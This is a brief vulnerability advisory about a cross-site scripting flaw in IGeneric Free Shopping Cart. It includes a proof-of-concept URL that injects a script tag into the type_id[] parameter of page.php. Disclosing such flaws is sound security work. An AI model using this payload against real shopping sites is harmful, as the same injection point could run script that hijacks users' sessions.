IGeneric Free Shopping Cart Cross-Site Scripting Vulnerability

IGeneric Free Shopping Cart Cross-Site Scripting Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

page.php?page_type=catalog_products&type_id[]=%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=